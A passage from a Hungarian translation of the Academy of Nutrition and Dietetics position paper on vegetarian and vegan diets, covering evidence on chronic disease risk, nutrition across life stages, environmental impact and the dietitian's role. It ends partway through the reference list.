rendszeresen fogyasztanak különféle zöldségeket, gyümölcsöket, teljes kiőrlésű gabonaféléket, hüvelyeseket és dióféléket. A kevés zsiradékot tartalmazó vegán és vegetáriánus étrend egyéb pozitív életmódbeli tényezőkkel társulva - mint a dohányzás mellőzése és a testsúly csökkentése - bizonyítottan az atheroszklerózis (érelmeszesedés) visszafejlődését eredményezi.61 A szívkoszorúér-betegségek kockázati tényezői, például a teljes koleszterin és az LDL-koleszterin, a testsúly és a testzsír rövid időn belül javulnak vegetáriánus diéta mellett, még koleszterinszint-csökkentő gyógyszerek használata nélkül is.61 A vegetáriánusok körében ritkábban fordul elő a magas vérnyomás a nem vegetáriánusokhoz képest. Az EPIC-Oxford tanulmány eredményei kimutatták, hogy a vegánoknak a legalacsonyabb a szisztolés és diasztolés vérnyomásuk, és náluk a legalacsonyabb a magas vérnyomás előfordulása az összes táplálkozási csoport közül (vegánok, vegetáriánusok, halevők és húsevők).62 A második Adventista Egészségügyi Tanulmány adatai szintén megerősítették, hogy a vegánoknak a legalacsonyabb a vérnyomásuk, és minden vegetáriánus csoport közül itt vannak legkevesebben a magas vérnyomásban szenvedők, lényegesen alacsonyabb a számuk, mint a húsevők között.55 Egy metaanalízis - amely több mint 21 000 ember vérnyomását hasonlította össze a világon - arra a következtetésre jutott, hogy a vegetáriánusok szisztolés vérnyomása körülbelül 7 Hgmm-rel, a diasztolés vérnyomásuk pedig 5 Hgmm-rel alacsonyabb, mint a vegyes táplálkozású népességé.63 Cukorbetegség A húsevőkkel összehasonlítva a lakto-ovo-vegetáriánusoknál és a vegánoknál kisebb a 2-es típusú cukorbetegség kockázata. A második Adventista Egészségügyi Tanulmányról szóló beszámoló szerint a húsevők között több mint kétszer annyi cukorbeteg van, mint a lakto-ovo- vegetáriánusok és a vegánok között, még a BMI-vel való korrekció után is.47 A tanulmány azt is megállapította, hogy már a cukorbetegség kialakulásának esélye is 77%-kal csökkent a vegánok esetében, és 54%-kal a lakto-ovo-vegetáriánusok esetében a nem vegetáriánusokhoz képest (életkor szerinti korrekció után). Amikor a BMI-t és egyéb befolyásoló tényezőket is figyelembe vették, az összefüggés továbbra is erős maradt. A vegánoknál 62%-kal kisebb valószínűséggel alakul ki cukorbetegség, míg a lakto-ovo-vegetáriánusok körében 38%-kal kisebb ez a valószínűség.64 Megelőzés Az elmúlt két évtizedben prospektív megfigyeléses tanulmányok és klinikai vizsgálatok jelentős bizonyítékokat szolgáltattak arra, hogy a teljes kiőrlésű gabonákban, gyümölcsökben, zöldségekben, hüvelyesekben, magvakban és diófélékben gazdag, viszont finomított gabonafélékben, vörös vagy feldolgozott húsokban és cukorral édesített italokban szegény étrend csökkenti a cukorbetegség kockázatát, javítja a glikémiás kontrollt és a vérlipidek kontrollját cukorbetegségben szenvedőknél.65 A teljes kiőrlésű gabonák fogyasztása szorosan összefügg a cukorbetegség kisebb kockázatával, még a BMI figyelembevétele után is.66 A hüvelyesek, amellett, hogy alacsony glikémiás indexű élelmiszerek, azért is előnyösek a cukorbetegek számára, mert csökkentik az étkezés utáni glükózszintet, sőt a következő étkezés utáni glükózszintet is, ez az úgynevezett ,,második étkezés effektus.67 Egy metaanalízis azt bizonyította, hogy a magasabb gyümölcs- vagy zöldségbevitel, különösen a zöld zöldségek fogyasztása a 2-es típusú cukorbetegség kockázatát jelentősen csökkenti.68 Az első és második ,,Ápolók Egészségügyi Tanulmányában a csonthéjasok, különösen a dió fogyasztása csökkentette a cukorbetegség kockázatát.69 Ezzel szemben a vörös és a feldolgozott húsok erősen növelték az éhomi glükóz- és inzulinkoncentrációt és a cukorbetegség kockázatát.70 A hús és a cukorbetegség összefüggésének lehetséges okai többek között a telített zsírsavak, a késői glikációs végtermékek, a nitrátok/nitritek, a hem vas, a trimetil-amin-N-oxid, az elágazó szénláncú aminosavak és az endokrin diszruptor vegyi anyagok.70 Kezelés. Randomizált klinikai vizsgálatokban az alacsony zsírtartalmú vegán étrend az Amerikai Diabétesz Egyesület iránymutatásai alapján összeállított étrenddel összehasonlítva jobb eredményt hozott a glikémiás kontroll, a vérlipidek és a testtömegkontroll terén is.71 2-es típusú cukorbetegek 24 hetes randomizált kontrollos vizsgálatában az izokalorikus vegetáriánus étrendet követő csoport jobb eredményeket ért el inzulinérzékenység, a zsigeri zsír csökkenése és a gyulladásos markerek csökkenése terén, mint a hagyományos diabetikus diétát követők.72 Hat kontrollos klinikai vizsgálat metaanalízise szerint a vegetáriánus étrend a glikémiás kontroll javulásával jár együtt a 2-es típusú cukorbetegségben szenvedőknél.73 A tápanyagban gazdag, magas rosttartalmú növényi ételekből összeállított vegetáriánus és vegán étrend csökkenti a 2-es típusú cukorbetegség kockázatát, és hatékony terápiás eszköz a 2-es típusú cukorbetegség kezelésére. Rák A második Adventista Egészségügyi Tanulmány kimutatta, hogy a vegetáriánus étrend összességében alacsonyabb rákkockázattal társul, különösen az emésztőrendszeri rákok tekintetében. Továbbá, a vegán étrend, úgy tűnik, nagyobb védelmet nyújt a rák előfordulása ellen, mint bármely más étrendi minta.74 Legutóbb arról számoltak be, hogy a vegán étrend 35%-kal csökkenti a prosztatarák kockázatát.75 Hét tanulmány metaanalízise azt az eredményt hozta, hogy a vegetáriánusok között 18%-kal kisebb a rákos megbetegedések előfordulása, mint a nem vegetáriánusoknál.59 Epidemiológiai vizsgálatok egyértelműen kimutatták, hogy gyümölcsök, zöldségek, hüvelyesek vagy a teljes kiőrlésű gabonák rendszeres fogyasztása bizonyos rákos megbetegedések kockázatát csökkenti.76 A zöldségfélékben, a hüvelyesekben, a gyümölcsökben, a fűszerekben és a teljes kiőrlésű gabonafélékben található fitokemikáliák hatalmas sokasága, mint például a szulforapán, ferulinsav, genisztein, indol-3-karbinol, kurkumin, epigallokatekin-3-gallát, diallil-diszulfid, rezveratrol, likopin és a kvercetin, védelmet nyújthat a rák ellen.77,78 Ezekről a fitokemikáliákról tudjuk, hogy beavatkoznak számos sejtszintű folyamatba, amely szerepet játszik a rák kialakulásában.79 A vegetáriánusok általában több rostot fogyasztanak az egyéb étrendek követőivel összehasonlítva. A tíz európai ország bevonásával készült EPIC tanulmány megállapította, hogy a legtöbb rostot tartalmazó étrend esetében 25%-kal csökkent a kolorektális (vastagbél és végbél) rák kockázata a legkevésbé rostos étrendhez képest.80 Másrészt, két nagy amerikai kohorsztanulmányban egyértelmű kapcsolatot figyeltek meg a feldolgozott vörös húsok fogyasztása és a kolorektális rák között.81 Azt is láttuk, hogy a feldolgozott húsok fogyasztása növeli a rákkal összefüggő halálozás kockázatát.82 Huszonhat epidemiológiai tanulmány szisztematikus áttekintése és metaanalízise azt mutatta, hogy napi 100 g vörös hús fogyasztása esetén a kolorektális mirigyhámból kiinduló jóindulatú daganatok (adenómák) kialakulásának relatív kockázata 1,27, illetve napi 50 g feldolgozott hústermék fogyasztása estén a relatív kockázat 1,29.83 Csontritkulás Csontokról készült tanulmányok arról számoltak be, hogy a vegetáriánusok csontjának ásványianyag-sűrűsége hasonló a vegyes táplálkozásúakéhoz, vagy kissé elmarad attól, míg a legalacsonyabb érték jellemzően a vegánoké.84 Mivel a különbségek viszonylag csekélyek, úgy tűnik, ennek nincs klinikai jelentősége, feltéve, hogy a kritikus tápanyagok megfelelően biztosítottak. A vegetáriánus étrendek számos tényezővel társulnak, amelyek elősegítik a csontot egészségét, beleértve a nagy mennyiségű zöldség és gyümölcs fogyasztását; a bőséges magnézium-, kálium-, K-vitamin és C-vitamin-bevitelt, valamint a viszonylag alacsony savterhelést.36 Ezzel szemben veszélyeztetheti a csontok egészségét, ha az étrendben kevés a kalcium, a D-vitamin, a B12-vitamin és a fehérje.36 Az EPIC-Oxford tanulmány 30%-kal nagyobb csonttörési kockázatot jelzett a vegánok csoportjára, de a lakto-ovo-vegetáriánusok esetében nincs eltérés a nem vegetáriánusokhoz képest. Ha azonban csak azokat a vegánokat szerepeltettük az elemzésben, akiknek a kalciumbevitele meghaladja az 525 mg-ot, a törési kockázat különbsége eltűnt.84 Az második Adventista Egészségügyi Tanulmány arról számolt be, hogy a hüvelyesek és húsanalógok gyakori fogyasztása hatékonyabban csökkenti a csípőcsonttörés kockázatát, mint a húsfogyasztás.85 A fehérje a csontok egészsége szempontjából semleges vagy enyhén pozitív hatású.36 A D- és B12-vitaminok elégtelen bevitele összefügg a csontok alacsony ásványianyag-sűrűségével, a csonttörés megnövekedett esélyével és a csontritkulással.36 Acsontok kiváló egészségének elérése és fenntartása érdekében a vegetáriánusok és vegánok számára erősen ajánlott a javasolt napi beviteli értékek betartása minden tápanyagból, különösen kalciumból, D-vitaminból, B12-vitaminból és fehérjéből, valamint nagy adag zöldség és gyümölcs rendszeres fogyasztása.36 VEGETÁRIÁNUS ÉTREND AZ ÉLET MINDEN SZAKASZÁBAN A jól megtervezett vegán, lakto-vegetáriánus és lakto-ovo-vegetáriánus étrend megfelelő, kielégíti a táplálkozási szükségleteket és normális növekedést biztosít az élet minden szakaszában, beleértve a terhességet és a szoptatást, a csecsemőkort, a gyermekkort, a serdülőkort, az idősebb felnőttkort és az élsportoló életmódot is. Várandósság és szoptatás Kisebb kutatások azt mutatják, hogy ahol elegendő élelmiszer van, ott a vegetáriánus nők terhességének kimenetele, például a születési súly és a terhesség időtartama hasonló a nem vegetáriánusokéhoz.7,86,87 Egy tanulmány szerint a vegetáriánus táplálkozás a várandósság első trimeszterében csökkentette a hasi elhízás kockázatát.88 A sok növényi táplálékot tartalmazó étrend a várandós nők esetében csökkentheti a terhesség szövődményeinek, például a terhességi cukorbetegség kialakulásának kockázatát.88,89 A Táplálkozási és Dietetikai Akadémia állásfoglalása és gyakorlati útmutatója, a ,,Táplálkozás és életmód az egészséges terhességért90,91 megfelelő útmutatást ad a várandós vegetáriánusok számára. Különösen figyelni kell a vas, a cink, a B12-vitamin és az EPA/DHA megfelelő szintjére.87,89 Az étrendi döntéstől függően a várandós vegetáriánusok vasbevitele nagyobb lehet, mint a nem vegetáriánusoké, és nagyobb valószínűséggel használnak vas tartalmú táplálék kiegészítőket.92 Az elégtelen vasbevitel lehetősége és a vashiány ártalmas hatásai miatt ajánlatos alacsony dózisú (30 mg) étrendkiegészítő vasat szedni a terhesség alatt.93 Az ajánlott vasmennyiség bevihető prenatális (terhességi) táplálékkiegészítővel, külön vaskészítménnyel vagy ezek kombinációjával is. Nincs elegendő bizonyíték arra, hogy a terhesség alatt a vegetáriánusok cink bevitele és cink státusza különbözne a nem vegetáriánusoktól.87,89 A várandósság alatt megnövekedett cinkigény, illetve a gabonák és hüvelyesek magas fitáttartalma miatt a cinkbevitel növelése és felszívódást javító élelmiszer-előkészítő technikák használata javasolható.7,8,29 Várandós és szoptató vegetáriánusoknak rendszeres és megfelelő étrendi és/vagy kiegészítő B12-vitamin-forrásokra van szükségük 7,8,89,91 A vegetáriánus nők gyermekeinek alacsonyabb a plazma-DHA-koncentrációja, és a vegetáriánus anyatej DHA-szintje is alacsonyabb.7,8 Ezek az n-3 zsírsavak bizonyos mértékig szintetizálhatók ?-linolénsavból, de a konverziós arány alacsony (bár némileg fokozott a várandósság alatt).8,89 Várandós és szoptató vegetáriánusok számára előnyös lehet a mikroalgákból kivont EPA és a DHA közvetlen bevitele.8,91 Csecsemők, gyermekek és serdülők Az első 6 hónapban a kizárólagos szoptatás az ajánlott táplálási mód.94 Ha ez nem lehetséges, akkor a kereskedelemben kapható csecsemőtápszer legyen az elsődleges élelmiszer az első évben. A kiegészítő élelmiszereknek energiában, fehérjében, vasban és cinkben gazdagnak kell lenniük, tartalmazhatnak hummuszt, tofut, jól megfőzött hüvelyeseket és avokádópürét.8 Telített zsír, dúsított szójatej vagy állati tej fogyasztása elkezdhető 1 éves korban, ha a gyermek normálisan fejlődik és különféle ételeket eszik.95 A vegetáriánus gyermekek és tizenévesek körében kisebb a túlsúly és az elhízás veszélye a nem vegetáriánus társaikhoz viszonyítva. Normál BMI-értékű gyermekek és fiatalok esetében valószínűbb, hogy felnőttkorukban is a normál BMI-tartományon belül lesznek, ami jelentősen csökkenti a betegségek kockázatát.96 A vegetáriánus étrend további előnye, hogy gyermekkorban és serdülőkorban nagyobb gyümölcs- és zöldségfogyasztással jár, kevesebb édesség és sós rágcsálnivaló fogyasztás, valamint kevesebb telítettzsír-bevitel mellett.97 Ha a gyermekek a kiegyensúlyozott vegetáriánus étrendhez szoknak hozzá az élet kezdeti szakaszában, akkor egész életen át tartó egészséges szokásokat alakíthatnak ki.8 Az étkezési zavarok megjelenése serdülőkorban a legvalószínűbb. Az étkezési zavarok etiológiája összetett. A vegetáriánus vagy vegán étrend nem látszik növelni a táplálkozási rendellenességek kockázatát, bár azok, akiknél már kialakult valamilyen étkezési zavar, használhatják ezt a táplálkozási formát a táplálékbevitel korlátozására.7,8 A fiatal vegetáriánusok megfelelő étrendjének tervezésekor a következő tápanyagokra kell nagy figyelmet fordítani: vas, cink, B12-vitamin, illetve egyes esetekben kalcium és D-vitamin. A vegetáriánus gyermekek fehérjebevitele általában eléri vagy meghaladja az ajánlásokat.7 A vegán gyermekek fehérjeigénye kissé magasabb lehet, mint a nem vegán gyermekeké a fogyasztott fehérjék emészthetőségének és aminosav-összetételének különbségei miatt.7 Az ajánlott fehérjetöbblet vegán gyermekeknek 30-35% 1-2 éves korban, 20-30% 2-6 éves korban és 15-20% 6 év felett.7,95 Bár az étrendi tényezők korlátozhatják a vas és a cink bevitelét, a vas-, illetve cinkhiány nagyon ritka a fejlett országokban élő vegetáriánus gyermekeknél.98 A gyermekek vas- és cinkszintjét szigorúan növényi alapú étrend esetén figyelemmel kell kísérni. Ilyen esetekben szükség lehet táplálékkiegészítők használatára.98 A vegán csecsemők és gyermekek B12-vitamin-bevitelét figyelemmel kell követni, értékelni kell, és szükség esetén B12-vitaminnal dúsított élelmiszereket és/vagy táplálékkiegészítőt kell alkalmazni a megfelelő bevitel biztosítására.7 Idősebb felnőttek Az idősebb vegetáriánusok tápanyagbevitele hasonlónak vagy jobbnak tűnik, mint az idősebb nem vegetáriánusoké,7 bár a múltbeli kutatások szerint alacsonyabb lehet a cinkbevitel és gyakoribb a vashiány a vegetáriánusok között.86,99 A kalóriaigény általában csökken a korral, míg néhány tápanyag iránt nő az igény, ezért fontos, hogy minden idős ember tápanyagban dús étrendet válasszon. Néhány adat arra utal, hogy a fehérjehasznosítás hatékonysága csökken az öregedéssel, ami magasabb fehérjebeviteli igényt jelent.100 Így fontos az idősebb vegetáriánusok és vegánok számára, hogy az étrendjük fehérjében gazdag élelmiszereket tartalmazzon, például hüvelyeseket és szóját. A húshelyettesítők hasznosak lehetnek mint fehérjeforrások. Idősebb emberek a D-vitamint kevésbé hatékonyan szintetizálják, és valószínűleg kiegészítő vitamin készítményt igényelnek, különösen, ha kevés a napsütés.35 Az idősebbek számára ajánlott magasabb kalciumbevitel könnyen megvalósítható kalciummal dúsított élelmiszerek, például növényi tejek fogyasztásával. A B6-vitamin-igény a kor előrehaladtával növekszik, és magasabb lehet, mint az aktuális ajánlott napi beviteli érték (RDA). A sorvadásos gyomorhurut gyakori az 50 év felettiek körében, és ez ronthatja a B12-vitamin felszívódását az állati termékekből. Ezért sok idős embernek, étrendtől függetlenül, szüksége van B12-vitamin-tartalmú táplálékkiegészítő szedésére. KÖRNYEZETI HATÁSOK A növényi alapú étrend környezetkímélőbb és fenntarthatóbb, mint az állati termékekben gazdag étrend, mert kevesebb természeti erőforrást használ, és jelentősen kevesebb környezetkárosítással jár.101,102,103,104,105 A jelenleg mindenütt a világon általános, húsban és tejtermékekben gazdag táplálkozás egyesek szerint nem fenntartható.101,103,105 Az Amerikai Táplálkozási Irányelvek Tudományos Tanácsa által végzett módszeres vizsgálat azt támasztja alá, hogy a növényi élelmiszerekben gazdag, de állati termékekben szegény (például a vegetáriánus) étrend kevesebb környezeti kárt okoz.106 Sok kutató szerint az állati termékek fogyasztásának jelentős csökkentése a legfontosabb tényezők egyike az éghajlatváltozás visszafordításában.105 www.vndpg.org A Vegetarian Nutrition Dietetic Practice Group (VNDPG) (Vegetáriánus Táplálkozás Dietetikai Gyakorlata Csoport). A csoport tagjai hozzáférhetnek a vegetáriánus táplálkozással kapcsolatos professzionális információkhoz, a dietetikusok számára készített forrásanyagokhoz, valamint negyedéves hírlevelet is kapnak. www.vegetariannutrition.net A VNDPG felhasználói weboldala. Blogot tartalmaz a megbízható vegetáriánus táplálkozásról és hozzáférést biztosít a dietetikai forrásokhoz az ügyfelek részére. www.vrg.org A Vegetáriánus Erőforrás Csoport táplálkozási információkat, recepteket, étkezési terveket és ajánlott cikkeket kínál a vegetáriánus táplálkozásról. www.PCRM.org A ,,Orvosok Bizottsága a Felelős Orvostudományért innovatív programokkal és ajánlatokkal támogatja a megelőző orvoslást és ingyenes oktatóanyagot biztosít a felhasználóknak. www.veganhealth.org A weboldal hiteles ajánlásokat tartalmaz a növényi alapú étrend táplálkozási jellemzőiről. www.nutritionfacts.org Ez a weboldal rövid, ajánlásokat tartalmazó videoklipeket és cikkeket tartalmaz a vegetáriánus táplálkozás számos vonatkozásában. www.vegweb.com A VegWeb vegetáriánus recepteket, közösségeket és blogokat kínál. www.vegetarian-nutrition.info A Vegetarian Nutrition Info aktuális cikkeket, forrásokat és híreket kínál. 2. ábra: Táplálkozási szakemberek és pácienseik számára ajánlott weboldalak vegetáriánus táplálkozás, élelmiszerek és a kapcsolódó témák tekintetében. Számos webhely kiváló minőségű oktatási anyagokat tartalmaz, amelyekre a dietetikusok, táplálkozási szakértők és más egészségügyi szakemberek is támaszkodhatnak. Ezek az oldalak támogatják a betegek vagy ügyfelek oktatását a vegetáriánus táplálkozásról az élet minden szakaszában, a kiemelten fontos tápanyagokra, étkezési tervekre és a nem vegetáriánus összetevők növényi alapú helyettesítésére vonatkozóan. Összehasonlítva a mindenevő étrenddel, a vegetáriánusok élelmezése kevesebb víz és fosszilis tüzelőanyag felhasználását igényli, kevesebb rovarirtót és műtrágyát használ.107 Ha a marhahúst babbal helyettesítenénk, jelentősen csökkenne az emberiség ökológiai lábnyoma: 1 kg fehérje előállítása vesebabból 18-szor kevesebb termőföldet, 10-szer kevesebb vizet, 9-szer kevesebb üzemanyagot, 12-szer kevesebb műtrágyát és egytized annyi rovarirtót igényel, mint ha ugyanennyi fehérjét marhahúsból állítanánk elő.108 Emellett a marhahústermelés jelentősen több trágyát termel, mint bármely más állati eredetű élelmiszer előállítása.108 Az Amerikai Környezetvédelmi Ügynökség szerint az Egyesült Államokban a folyók és tavak vízszennyezésének mintegy 70%-a az állattenyésztő telepekről származik.109 Az állattenyésztés talajromlással, levegőszennyezéssel, a biológiai sokszínűség csökkenésével és globális felmelegedéssel jár együtt.104,110 A húsipar jelentősen hozzájárul az antropogén szén-dioxid, metán és dinitrogén-oxid termeléshez.101,103,111 Kétszáztíz általánosan elterjedt élelmiszer figyelembevételével végzett számítás azt mutatja, hogy a vegetáriánus étrend 29%-kal;112 míg a vegán (növényi alapú) étrend több mint 50%-kal kevesebb üvegház hatású gáz termelésével járhat, mint a nem vegetáriánus étrend.102 Egy nemrégiben készült tanulmány megállapította, hogy az állattenyésztők számára kidolgozott új technológiák segítségével is csak 9%-kal csökkent az üvegház hatású gázok kibocsátása az állattenyésztési és húsipari folyamatok során.113 A szerzők leszögezték: az üvegház hatású gázok kibocsátását csökkenteni kell a globális hőmérsékleti cél eléréséhez, és ez ,,hosszú távon súlyos következményekkel jár az állati eredetű élelmiszerek fogyasztására az egész világon.113 Mások felvetették, hogy az állatipar termelésének csökkentése nagyobb lehetőség az üvegház hatású gázok kibocsátásának csökkentésére, mint ,,a technológiai mérséklés vagy a termelékenység növelése.105 Az állattenyésztésben hozamnövelésre, illetve a betegségek megelőzésére és kezelésére használt antibiotikumok antibiotikumokkal szemben rezisztens baktériumok kifejlődéséhez vezettek. Az antibiotikum rezisztencia az állatokból átkerülhet az emberekre is az élelmiszer fogyasztásával, és ez már most is súlyos közegészségügyi problémát okoz. Olyan betegségeket idéz elő, amelyeket nehéz kezelni, s növeli a betegségek előfordulását (morbiditás), a halálozást (mortalitás) és az egészségügy költségeit.105,114 A DIETETIKUS ÉS A TÁPLÁLKOZÁSI TANÁCSADÓ SZEREPE, FELELŐSSÉGE ÉS FORRÁSAI A vegán és a vegetáriánus táplálkozás jelentős egészségügyi előnyökkel járhat a nem vegetáriánus étrendekkel szemben. Az energiabevitel egyensúlyban tartása; a kiegyensúlyozott tápanyagbevitel és a különböző zöldségek, hüvelyesek, gyümölcsök, teljes kiőrlésű gabonák, diófélék és magvak átgondolt fogyasztása maximalizálhatja ezeket az előnyöket. A dietetikusok és táplálkozási tanácsadók kulcsszerepet játszhatnak abban, hogy a vegetáriánusok megfelelő oktatást kapjanak az egyes tápanyagforrásokkal és az egyes élelmiszerek bizonyos krónikus betegségek kezelésében játszott szerepével kapcsolatban. A hatékony tanácsadáshoz a dietetikusnak és a táplálkozási tanácsadónak megfelelő ismeretekkel kell rendelkeznie és hozzá kell férnie az oktatási anyagokhoz. Az Egyesült Államok Mezőgazdasági Minisztériuma által létrehozott ,,ChooseMyPlate életviteli program elérhető az interneten és tartalmaz lakto-ovo vegetáriánus és vegán menüt is. A fehérje táplálékcsoportban megjelennek a babok és borsók, a diófélék és magvak, valamint a szójatermékek, csakúgy, mint a tojás az ovo-vegetáriánusok számára.115 A vitaminnal dúsított szójatej a tehéntej alternatívájaként szerepel, és kalciumforrásként a kalciummal dúsított élelmiszerek (gyümölcslevek, gabonafélék, kenyér, rizstej és mandulatej), valamint a kelkáposzta választhatók.116,117 Az interneten rendelkezésre állnak az Egyesült Államok Mezőgazdasági Minisztériumának ,,ChooseMyPlate programja alapján összeállított vegán táplálkozási útmutatók, amelyek tartalmazzák a megfelelő kalcium-, B12-vitamin, jód-, és n-3 zsírsav forrásokat (www.vrg.org/nutshell/MyVeganPlate.pdf; www.becomingvegan.ca/food-guide; www.theveganrd.com/food-guide-for-vegans), és hiteles információ áll rendelkezésre a dietetikusok és ügyfeleik részére a Vegetarian Nutrition Dietetic Practice Group (Vegetáriánus Táplálkozás Dietetikai Gyakorlata Csoport) honlapján (www.vegetariannutrition.net). Ezek az információk rendszeresen frissítésre kerülnek és tájékoztatást nyújtanak a növényi étrendben kritikus tápanyagokról, az életciklus figyelembevételével. A 2. ábra: olyan hasznos weboldalakat sorol fel, amelyek népszerűsítik és ösztönzik a bizonyítottan megfelelő és megbízható étrendi választásokat mind a dietetikus, mind az ügyfelei számára. További ajánlások találhatók a bizonyítékelemzési könyvtárban, amely ingyenesen elérhető a Táplálkozási és Dietetikai Akadémia minden tagja számára. Minden dietetikusnak etikai kötelezettsége, hogy tiszteletben tartsa a vegetáriánus étrendet épp úgy, mint minden más táplálkozási mintát. KÖVETKEZTETÉSEK A növényi alapú étrendek elfogadottsága és az irántuk megnyilvánuló érdeklődés növekedni fog az Egyesült Államokban és a világ más részein egyaránt, ahogyan a kormányzati szervek és az egészségügyi/táplálkozási szervezetek ajánlják a növényi élelmiszerek rendszeres fogyasztását. A bőséges piaci választék megkönnyíti a növényi alapú étrend követését. A jól összeállított vegetáriánus étrend megfelelő tápanyagbevitelt biztosít az életciklus minden szakaszában, és hasznos lehet bizonyos krónikus betegségek kezelésében. A teljes tápanyagbevitel az Alternatív Egészséges Étkezési Index értékelése szerint általában jobb a vegetáriánus és vegán étrendek mellett, mint a mindenevőknél. Bár egynémely vegetáriánus étrend bizonyos mértékig szegény lehet egyes tápanyagokban, például kalciumban és B12-vitaminban, ezt megfelelő módon ellensúlyozhatja a gondos tervezés. A vegetáriánus étrend a nem vegetáriánus étrenddel szemben védelmet nyújthat számos krónikus betegség, például szívbetegségek, a magas vérnyomás, a 2-es típusú cukorbetegség, az elhízás és néhány daganatos betegség ellen. Továbbá a vegetáriánus étrend gazdaságosabban használja a természeti erőforrásokat, és kevesebb környezetrombolást okoz. Ma már nagy oktatási erőforrások állnak rendelkezésre, a dietetikusok és a táplálkozási tanácsadók egyre több naprakész információval segíthetik vegetáriánus ügyfeleiket, hogy tájékozott döntéseket hozzanak a táplálkozási egészségükről. ÁLLÁSFOGLALÁS A Táplálkozási és Dietetikai Akadémia úgy foglal állást, hogy a megfelelően összeállított vegetáriánus étrend, beleértve a vegán étrendet is, egészséges, tápanyag bevitel szempontjából megfelelő, és egészségügyileg előnyös lehet bizonyos betegségek megelőzésében és kezelésében. Ezek az étrendek megfelelőek az emberi életciklus minden szakaszában, beleértve a terhességet, a szoptatást, a kisgyermekkort, a gyermekkort, a serdülőkort, az idősebb felnőttkort és a sportoló életmódot is. A növényi alapú étrend környezetkímélőbb, mint az állati termékekben gazdag étrend, mivel kevesebb természeti erőforrást használ és sokkal kevesebb környezeti kárt okoz. A Táplálkozási és Dietetikai Akadémia jelen állásfoglalását 1987. október 18-án fogadta el a Delegates House Leadership Team (Képviselők Házának Vezetői Csoportja), és megerősítette a következő időpontokban: 1992. szeptember 12.; 1996. szeptember 6.; 2000. június 22.; 2006. június 11.; és 2012. március 19. Ez az állásfoglalás 2021. december 31-ig érvényes. Az állásfoglalások nem használhatók termékek vagy szolgáltatások jóváhagyására. Az állásfoglalás egyes részeinek felhasználására vagy teljes közzétételére vonatkozó összes kérést az Akadémiára kell irányítani a journal@eatright.org címre. Szerzők: Vesanto Melina, MS, RD (tanácsadó, Vancouver, Kanada); Winston Craig, PhD, MPH, RD (Andrews Egyetem, Berrien Springs, MI); Susan Levin, MS, RD, CSSD (orvosi bizottság a felelős orvoshoz, Washington, DC). LEHETSÉGES ÖSSZEFÉRHETETLENSÉGI NYILATKOZAT A szerzők nem jelentettek potenciális összeférhetetlenséget. FINANSZÍROZÁS/TÁMOGATÁS Nincs közzétehető finanszírozás. Bírálók: Éhezés és Környezetvédelmi Táplálkozás Gyakorlati Dietetikai Csoportja (Melissa Altman-Traub, MS, RDN, LDN, Phila-delphia Közösségi Főiskola, Philadelphia, PA); Catherine Conway, MS, RDN, CDN, CDE (YAI / Fogyatékkal élők Országos Intézete, New York, New York); Sharon Denny, MS, RD (Akadémia Tudásközpont, Chicago, IL); Sarah Picklo Halabu, RDN, LDN, CDE (Akadémiai kiadványok és források, Chicago, IL); D. Enette Larson-Meyer, PhD, RD, CSSD (Wyoming Egyetem, Laramie, WY); Mark E. Rifkin, MS, RD (Akadémiai Politikai Kezdeményezések & Tanácsadás, Washington, DC); Tamara Schryver, PhD, MS, RD (The Schwan Food Company, Minneapolis, MN); Alison Steiber, PhD, RD (Academy Research, Nemzetközi és Tudományos ügyek, Chicago, IL); Vegetáriánus Táplálkozást Gyakorló Dietetikusok Csoportja (John Westerdahl, PhD, MPH, RD, CNS, FAND, Bragg Egészségügyi Alapítvány, Santa Barbara, CA). Akadémiai Állásfoglalás Bizottsági Munkacsoport: Mary Ellen E. Posthauer, RDN, CD, LD, FAND (szék) (MEP Egészségügyi Táplálkozási Szolgáltatások, Inc., Evansville, IN); Ainsley Malone, MS, RD, LD, CNSC, FAND, FASPEN (Parenterális és Enterális Táplálkozás Amerikai Közössége, New Albany, OH); Joan Sabate, MD, DrPH (tartalom tanácsadó) (Loma Linda Egyetem, Loma Linda, CA). A szerzők megköszönik a bírálóknak a számos konstruktív megjegyzést és javaslatot. A bírálókat nem kérték, hogy támogassák ezt az álláspontot vagy a támogató dokumentumot. Referenciák - 1.Stahler C. How often do Americans eat vegetarian meals? And how many adults in the US are vegetarian? The Vegetarian Resource Group website. http://www. vrg.org/nutshell/Polls/2016_adults_veg. htm. Accessed June 23, 2016. - 2. Hoek AC, Luning PA, Weijzen P, Engels W, Kok FJ, de Graaf C. Replace- ment of meat by meat substitutes. A survey on person- and product-related factors in consumer acceptance. Appe- tite. 2011;56(3):662-673. - 3.American Institute for Cancer Research. Recommendations for cancer preven-tion. http://www.aicr.org/reduce-your-cancer-risk/recommendations-for-cancer prevention/recommendations_04_ plant_based.html?gclid 1/4 CJ6O7dpboCFcid4AodhkMAIA. Accessed June 23, 2016. - 4.US Department of Agriculture, US Department of Health and Human Ser-vices. 2015-2020 Dietary Guidelines for Americans. 8th ed. Washington, DC: US Government Printing Office; 2015. http://health.gov/dietaryguidelines/2015. Accessed June 23, 2016. - 5.US Department of Agriculture. Super-Tracker. https://www.supertracker.usda. gov/default.aspx. Accessed June 23, 2016. - 6.Institute of Medicine. Dietary reference intakes for energy, carbohydrate, fiber, fat, fatty acids, cholesterol, protein, and amino acids. http://www.nap.edu/ download.php?record_id 1/4 10490. Accessed June 23, 2016. - 7.Mangels R, Messina V, Messina M. The Dietitians Guide to Vegetarian Diets. 3rd ed. Sudbury, MA: Jones and Bartlett; 2011. - 8.Davis B, Melina V. Becoming Vegan: Comprehensive Edition. Summertown, TN: Book Publishing Co; 2014. - 9.Messina V. Nutritional and health bene- fits of dried beans. Am J Clin Nutr. 2014;100(suppl 1):437S-442S. - 10.Saunders AV, Davis BC, Garg ML. Omega- 3 polyunsaturated fatty acids and vege- tarian diets. Med J Aust. 2013;199 (4 suppl):S22-S26. - 11. Sanders TA. DHA status of vegetarians. Prostaglandins Leukot Essent Fatty Acids. 2009;81(2-3):137-141. - 12. Sarter B, Kelsey KS, Schwartz TA, et al. Blood docosahexaenoic acid and eicosa- pentaenoic acid in vegans: Associations with age and gender and effects of an algal-derived omega-3 fatty acid sup- plement. Clin Nutr. 2015;34(2):212-218. - 13.Gibson RA, Muhlhausler B, Makrides M. Conversion of linoleic acid and alpha- linolenic acid to long-chain poly- unsaturated fatty acids (LCPUFAs), with a focus on pregnancy, lactation and the first 2 years of life. Matern Child Nutr. 2011;7(suppl 2):17-26. - 14. Rosell MS, Lloyd-Wright Z, Appleby PN, et al. Long-chain n-3 polyunsaturated fatty acids in plasma in British meat- eating, vegetarian, and vegan men. Am J Clin Nutr. 2005;82(2):327-334. - 15. 